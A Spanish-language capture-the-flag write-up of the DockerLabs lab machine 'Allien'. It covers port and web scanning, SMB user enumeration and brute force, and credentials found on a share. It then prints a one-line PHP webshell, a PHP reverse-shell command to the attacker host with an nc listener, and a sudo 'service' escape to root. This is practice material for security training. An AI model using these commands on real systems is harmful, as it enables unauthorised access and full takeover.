Ir al contenido

Allien

En este artículo documentamos la resolución de la máquina virtual Allien, desarrollada por Luisillo_o y catalogada con un nivel de dificultad fácil.

El análisis se organiza en tres fases principales:

  1. Reconocimiento – Identificación de servicios, rutas y posibles vectores de ataque.
  2. Explotación – Ejecución de vulnerabilidades encontradas para obtener acceso inicial.
  3. Escalada de privilegios – Obtención de control total del sistema.
  • Nombre: Allien
  • Autor: Luisillo_o
  • Dificultad: Fácil
  • Fecha de creación: 10/10/2024
  1. Descargamos la máquina desde DockerLabs.

  2. Descomprimimos el paquete:

    Ventana de terminal
    unzip Allien.zip
  3. Ejecutamos el despliegue:

    Ventana de terminal
    sudo bash auto_deploy.sh Allien.tar

Al iniciar la máquina, su IP se muestra en la consola.

IP asignada

Creamos un entorno de trabajo:

Ventana de terminal
mkdir Allien
cd Allien
mkt # Crea carpetas: content, exploits, nmap, scripts

Ejecutamos Nmap para descubrir puertos:

Ventana de terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

Ventana de terminal
extractPorts allPorts

Puertos abiertos

Servicios detectados:

  • 22 (SSH)
  • 80 (HTTP)
  • 139 (SMB)
  • 445 (SMB)

Services

Lanzamos Gobuster:

Ventana de terminal
gobuster dir -u http://172.17.0.2/ \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \
-x php,html,txt,js -t 200

Gobuster

Rutas encontradas:

  • Index – Login simple sin vulnerabilidades visibles. Index

  • info.php – Información de configuración PHP. info php

  • productos.php – Página de tienda. productos

Con enum4linux descubrimos usuarios y directorios compartidos:

  • Usuarios: Users samba

  • Carpetas compartidas: Dir samba

Detectamos al usuario satriani7 y realizamos fuerza bruta con crackmapexec:

password satrian

Listamos los shares accesibles:

shares smb satrian

Conectamos al servicio SMB:

samba client

En Documents/Personal hallamos:

  • Notes.txt → nada útil. nada importante

  • Credentials.txt → credenciales de usuarios. passwords

Probamos credenciales de administrador. Confirmamos acceso a los shares:

shares administrador

Al revisar, confirmamos que allí se aloja la web. Subimos una webshell:

<?php system($_GET['cmd']); ?>

webshell

Abrimos puerto en la máquina atacante:

Ventana de terminal
nc -nlvp 443

Ejecutamos comando con PHP en la webshell:

php -r '$sock=fsockopen("172.17.0.1",443);exec("sh <&3 >&3 2>&3");'

ReverseShell

Conexión activa como www-data: www-data

Comprobamos permisos sudo:

Ventana de terminal
sudo -l

sudo -l

Podemos ejecutar /usr/bin/service como root.

Buscamos en GTFOBins: SearchBins

Ejecutamos:

Ventana de terminal
sudo service ../../bin/sh

Y obtenemos acceso como root: Root

La máquina Allien combina vectores clásicos:

  • Reconocimiento web y SMB para obtener credenciales.
  • Explotación vía Samba para escalar acceso a la web.
  • WebShell + Reverse Shell para ejecución remota.
  • Uso indebido de sudo con service para rootear el sistema.

Un CTF ideal para practicar explotación combinada de servicios. 🚀